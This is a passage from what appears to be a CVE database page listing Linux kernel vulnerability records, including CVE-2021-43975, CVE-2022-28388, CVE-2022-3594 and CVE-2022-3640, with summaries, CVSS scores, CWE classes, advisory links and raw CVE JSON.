    "CVE-2023-3609",
    "CVE-2023-3611",
    "CVE-2023-4128",
    "CVE-2023-4206",
    "CVE-2023-4207",
    "CVE-2023-4208",
    "CVE-2023-31436",
    "CVE-2021-43975",
    "CVE-2022-3594",
    "CVE-2022-3640",
    "CVE-2022-28388",
    "CVE-2022-38457",
    "CVE-2022-40133",
    "CVE-2023-33951",
    "CVE-2023-33952",
    "CVE-2022-40982",
    "CVE-2022-42895",
    "CVE-2022-45869",
    "CVE-2023-4155",
    "CVE-2023-30456",
    "CVE-2022-45887",
    "CVE-2023-0458",
    "CVE-2023-0590",
    "CVE-2023-0597",
    "CVE-2023-1073",
    "CVE-2023-1074",
    "CVE-2023-1079",
    "CVE-2023-1118",
    "CVE-2023-1206",
    "CVE-2023-1252",
    "CVE-2023-1382",
    "CVE-2023-1989",
    "CVE-2023-1998",
    "CVE-2023-2513",
    "CVE-2023-3161",
    "CVE-2023-3268",
    "CVE-2023-3772",
    "CVE-2023-4132",
    "CVE-2023-4732",
    "CVE-2023-23455",
    "CVE-2023-26545",
    "CVE-2023-28328",
    "CVE-2023-28772",
    "CVE-2023-31084",
    "CVE-2023-33203",
    "CVE-2023-35823",
    "CVE-2023-35824",
    "CVE-2023-35825",
    "CVE-2023-1075",
    "CVE-2023-1855",
    "CVE-2023-3141",
    "CVE-2023-3212"
  ],
  "summary": "Important: kernel security, bug fix, and enhancement update"
}

CVE-2021-43975 (GCVE-0-2021-43975)

Vulnerability from cvelistv5 – Published: 2021-11-17 16:32 – Updated: 2024-08-04 04:10

Summary

In the Linux kernel through 5.15.2, hw_atl_utils_fw_rpc_wait in drivers/net/ethernet/aquantia/atlantic/hw_atl/hw_atl_utils.c allows an attacker (who can introduce a crafted device) to trigger an out-of-bounds write via a crafted length value.

Severity

No CVSS data available.

CWE

Assigner

mitre

References

7 references

URL	Tags
https://lore.kernel.org/netdev/163698540868.13805…	x_refsource_MISC
https://git.kernel.org/pub/scm/linux/kernel/git/n…	x_refsource_MISC
https://lists.fedoraproject.org/archives/list/pac…	vendor-advisoryx_refsource_FEDORA
https://lists.fedoraproject.org/archives/list/pac…	vendor-advisoryx_refsource_FEDORA
https://security.netapp.com/advisory/ntap-2021121…	x_refsource_CONFIRM
https://lists.debian.org/debian-lts-announce/2022…	mailing-listx_refsource_MLIST
https://www.debian.org/security/2022/dsa-5096	vendor-advisoryx_refsource_DEBIAN

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T04:10:17.165Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://lore.kernel.org/netdev/163698540868.13805.17800408021782408762.git-patchwork-notify%40kernel.org/T/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=b922f622592af76b57cbc566eaeccda0b31a3496"
          },
          {
            "name": "FEDORA-2021-eab8c5a263",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X24M7KDC4OJOZNS3RDSYC7ELNELOLQ2N/"
          },
          {
            "name": "FEDORA-2021-c09b851eb0",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YODMYMGZYDXQKGJGX7TJG4XV4L5YLLBD/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20211210-0001/"
          },
          {
            "name": "[debian-lts-announce] 20220309 [SECURITY] [DLA 2941-1] linux-4.19 security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/03/msg00012.html"
          },
          {
            "name": "DSA-5096",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2022/dsa-5096"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel through 5.15.2, hw_atl_utils_fw_rpc_wait in drivers/net/ethernet/aquantia/atlantic/hw_atl/hw_atl_utils.c allows an attacker (who can introduce a crafted device) to trigger an out-of-bounds write via a crafted length value."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-03-10T02:06:54.000Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://lore.kernel.org/netdev/163698540868.13805.17800408021782408762.git-patchwork-notify%40kernel.org/T/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=b922f622592af76b57cbc566eaeccda0b31a3496"
        },
        {
          "name": "FEDORA-2021-eab8c5a263",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X24M7KDC4OJOZNS3RDSYC7ELNELOLQ2N/"
        },
        {
          "name": "FEDORA-2021-c09b851eb0",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YODMYMGZYDXQKGJGX7TJG4XV4L5YLLBD/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20211210-0001/"
        },
        {
          "name": "[debian-lts-announce] 20220309 [SECURITY] [DLA 2941-1] linux-4.19 security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/03/msg00012.html"
        },
        {
          "name": "DSA-5096",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2022/dsa-5096"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-43975",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "In the Linux kernel through 5.15.2, hw_atl_utils_fw_rpc_wait in drivers/net/ethernet/aquantia/atlantic/hw_atl/hw_atl_utils.c allows an attacker (who can introduce a crafted device) to trigger an out-of-bounds write via a crafted length value."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://lore.kernel.org/netdev/163698540868.13805.17800408021782408762.git-patchwork-notify@kernel.org/T/",
              "refsource": "MISC",
              "url": "https://lore.kernel.org/netdev/163698540868.13805.17800408021782408762.git-patchwork-notify@kernel.org/T/"
            },
            {
              "name": "https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=b922f622592af76b57cbc566eaeccda0b31a3496",
              "refsource": "MISC",
              "url": "https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=b922f622592af76b57cbc566eaeccda0b31a3496"
            },
            {
              "name": "FEDORA-2021-eab8c5a263",
              "refsource": "FEDORA",
              "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X24M7KDC4OJOZNS3RDSYC7ELNELOLQ2N/"
            },
            {
              "name": "FEDORA-2021-c09b851eb0",
              "refsource": "FEDORA",
              "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YODMYMGZYDXQKGJGX7TJG4XV4L5YLLBD/"
            },
            {
              "name": "https://security.netapp.com/advisory/ntap-20211210-0001/",
              "refsource": "CONFIRM",
              "url": "https://security.netapp.com/advisory/ntap-20211210-0001/"
            },
            {
              "name": "[debian-lts-announce] 20220309 [SECURITY] [DLA 2941-1] linux-4.19 security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2022/03/msg00012.html"
            },
            {
              "name": "DSA-5096",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2022/dsa-5096"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-43975",
    "datePublished": "2021-11-17T16:32:30.000Z",
    "dateReserved": "2021-11-17T00:00:00.000Z",
    "dateUpdated": "2024-08-04T04:10:17.165Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-28388 (GCVE-0-2022-28388)

Vulnerability from cvelistv5 – Published: 2022-04-03 20:07 – Updated: 2025-05-05 16:21

Summary

usb_8dev_start_xmit in drivers/net/can/usb/usb_8dev.c in the Linux kernel through 5.17.1 has a double free.

Severity

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

Assigner

mitre

References

7 references

URL	Tags
https://github.com/torvalds/linux/commit/3d3925ff…	x_refsource_MISC
https://lists.fedoraproject.org/archives/list/pac…	vendor-advisoryx_refsource_FEDORA
https://lists.fedoraproject.org/archives/list/pac…	vendor-advisoryx_refsource_FEDORA
https://lists.fedoraproject.org/archives/list/pac…	vendor-advisoryx_refsource_FEDORA
https://www.debian.org/security/2022/dsa-5127	vendor-advisoryx_refsource_DEBIAN
https://security.netapp.com/advisory/ntap-2022051…	x_refsource_CONFIRM
https://www.debian.org/security/2022/dsa-5173	vendor-advisoryx_refsource_DEBIAN

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T05:56:14.998Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/torvalds/linux/commit/3d3925ff6433f98992685a9679613a2cc97f3ce2"
          },
          {
            "name": "FEDORA-2022-af492757d9",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LAWC35TO642FOP3UCA3C6IF7NAUFOVZ6/"
          },
          {
            "name": "FEDORA-2022-5cd9d787dc",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XFMPUI3WI4U2F7ONHRW36WDY4ZE7LGGT/"
          },
          {
            "name": "FEDORA-2022-91633399ff",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6IHHC455LMSJNG4CSZ5CEAHYWY2DE5YW/"
          },
          {
            "name": "DSA-5127",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2022/dsa-5127"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20220513-0001/"
          },
          {
            "name": "DSA-5173",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2022/dsa-5173"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2022-28388",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-04-23T13:21:03.014768Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-415",
                "description": "CWE-415 Double Free",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-05-05T16:21:52.141Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "usb_8dev_start_xmit in drivers/net/can/usb/usb_8dev.c in the Linux kernel through 5.17.1 has a double free."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-07-04T10:10:18.000Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/torvalds/linux/commit/3d3925ff6433f98992685a9679613a2cc97f3ce2"
        },
        {
          "name": "FEDORA-2022-af492757d9",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LAWC35TO642FOP3UCA3C6IF7NAUFOVZ6/"
        },
        {
          "name": "FEDORA-2022-5cd9d787dc",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XFMPUI3WI4U2F7ONHRW36WDY4ZE7LGGT/"
        },
        {
          "name": "FEDORA-2022-91633399ff",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6IHHC455LMSJNG4CSZ5CEAHYWY2DE5YW/"
        },
        {
          "name": "DSA-5127",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2022/dsa-5127"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20220513-0001/"
        },
        {
          "name": "DSA-5173",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2022/dsa-5173"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2022-28388",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "usb_8dev_start_xmit in drivers/net/can/usb/usb_8dev.c in the Linux kernel through 5.17.1 has a double free."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/torvalds/linux/commit/3d3925ff6433f98992685a9679613a2cc97f3ce2",
              "refsource": "MISC",
              "url": "https://github.com/torvalds/linux/commit/3d3925ff6433f98992685a9679613a2cc97f3ce2"
            },
            {
              "name": "FEDORA-2022-af492757d9",
              "refsource": "FEDORA",
              "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LAWC35TO642FOP3UCA3C6IF7NAUFOVZ6/"
            },
            {
              "name": "FEDORA-2022-5cd9d787dc",
              "refsource": "FEDORA",
              "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XFMPUI3WI4U2F7ONHRW36WDY4ZE7LGGT/"
            },
            {
              "name": "FEDORA-2022-91633399ff",
              "refsource": "FEDORA",
              "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6IHHC455LMSJNG4CSZ5CEAHYWY2DE5YW/"
            },
            {
              "name": "DSA-5127",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2022/dsa-5127"
            },
            {
              "name": "https://security.netapp.com/advisory/ntap-20220513-0001/",
              "refsource": "CONFIRM",
              "url": "https://security.netapp.com/advisory/ntap-20220513-0001/"
            },
            {
              "name": "DSA-5173",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2022/dsa-5173"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2022-28388",
    "datePublished": "2022-04-03T20:07:39.000Z",
    "dateReserved": "2022-04-03T00:00:00.000Z",
    "dateUpdated": "2025-05-05T16:21:52.141Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-3594 (GCVE-0-2022-3594)

Vulnerability from cvelistv5 – Published: 2022-10-18 00:00 – Updated: 2025-04-14 15:58

Title

Linux Kernel BPF r8152.c intr_callback logging of excessive data

Summary

A vulnerability was found in Linux Kernel. It has been declared as problematic. Affected by this vulnerability is the function intr_callback of the file drivers/net/usb/r8152.c of the component BPF. The manipulation leads to logging of excessive data. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211363.

Severity

5.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CWE

CWE-404 - Denial of Service -> CWE-779 Logging of Excessive Data

Assigner

VulDB

References

4 references

URL	Tags
https://git.kernel.org/pub/scm/linux/kernel/git/b…
https://vuldb.com/?id.211363
https://lists.debian.org/debian-lts-announce/2022…	mailing-list
https://lists.debian.org/debian-lts-announce/2022…	mailing-list

Impacted products

1 product

Vendor	Product	Version
Linux	Kernel	Affected: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:02.039Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=93e2be344a7db169b7119de21ac1bf253b8c6907"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211363"
          },
          {
            "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html"
          },
          {
            "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-3594",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-04-11T20:53:55.506127Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-04-14T15:58:13.740Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability was found in Linux Kernel. It has been declared as problematic. Affected by this vulnerability is the function intr_callback of the file drivers/net/usb/r8152.c of the component BPF. The manipulation leads to logging of excessive data. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211363."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-404",
              "description": "CWE-404 Denial of Service -\u003e CWE-779 Logging of Excessive Data",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-12-24T00:00:00.000Z",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=93e2be344a7db169b7119de21ac1bf253b8c6907"
        },
        {
          "url": "https://vuldb.com/?id.211363"
        },
        {
          "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html"
        },
        {
          "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html"
        }
      ],
      "title": "Linux Kernel BPF r8152.c intr_callback logging of excessive data",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3594",
    "datePublished": "2022-10-18T00:00:00.000Z",
    "dateReserved": "2022-10-18T00:00:00.000Z",
    "dateUpdated": "2025-04-14T15:58:13.740Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-3640 (GCVE-0-2022-3640)

Vulnerability from cvelistv5 – Published: 2022-10-21 00:00 – Updated: 2024-08-03 01:14

Title

Linux Kernel Bluetooth l2cap_core.c l2cap_conn_del use after free

Summary

A vulnerability, which was classified as critical, was found in Linux Kernel. Affected is the function l2cap_conn_del of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211944.

Severity

5.5 (Medium)


                        
                          CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

CWE

CWE-119 - Memory Corruption -> CWE-416 Use After Free

Assigner

VulDB

References

7 references

URL	Tags
https://git.kernel.org/pub/scm/linux/kernel/git/b…
https://vuldb.com/?id.211944
https://lists.fedoraproject.org/archives/list/pac…	vendor-advisory
https://lists.fedoraproject.org/archives/list/pac…	vendor-advisory
https://lists.fedoraproject.org/archives/list/pac…	vendor-advisory
https://lists.debian.org/debian-lts-announce/2022…	mailing-list
https://lists.debian.org/debian-lts-announce/2022…	mailing-list

Impacted products

1 product

Vendor	Product	Version
Linux	Kernel	Affected: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:03.216Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=42cf46dea905a80f6de218e837ba4d4cc33d6979"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211944"
          },
          {
            "name": "FEDORA-2022-64ab9153c0",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OD7VWUT7YAU4CJ247IF44NGVOAODAJGC/"
          },
          {
            "name": "FEDORA-2022-65a0a3504a",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DGOIRR72OAFE53XZRUDZDP7INGLIC3E3/"
          },
          {
            "name": "FEDORA-2022-7aadaadebc",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XG2UPX3MQ7RKRJEUMGEH2TLPKZJCBU5C/"
          },
          {
            "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html"
          },
          {
            "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability, which was classified as critical, was found in Linux Kernel. Affected is the function l2cap_conn_del of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211944."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-119",
              "description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-12-24T00:00:00.000Z",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=42cf46dea905a80f6de218e837ba4d4cc33d6979"
        },
        {
          "url": "https://vuldb.com/?id.211944"
        },
        {
          "name": "FEDORA-2022-64ab9153c0",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OD7VWUT7YAU4CJ247IF44NGVOAODAJGC/"
        },
        {
          "name": "FEDORA-2022-65a0a3504a",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DGOIRR72OAFE53XZRUDZDP7INGLIC3E3/"
        },
        {
          "name": "FEDORA-2022-7aadaadebc",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XG2UPX3MQ7RKRJEUMGEH2TLPKZJCBU5C/"
        },
        {
          "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html"
        },
        {
          "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html"
        }
      ],
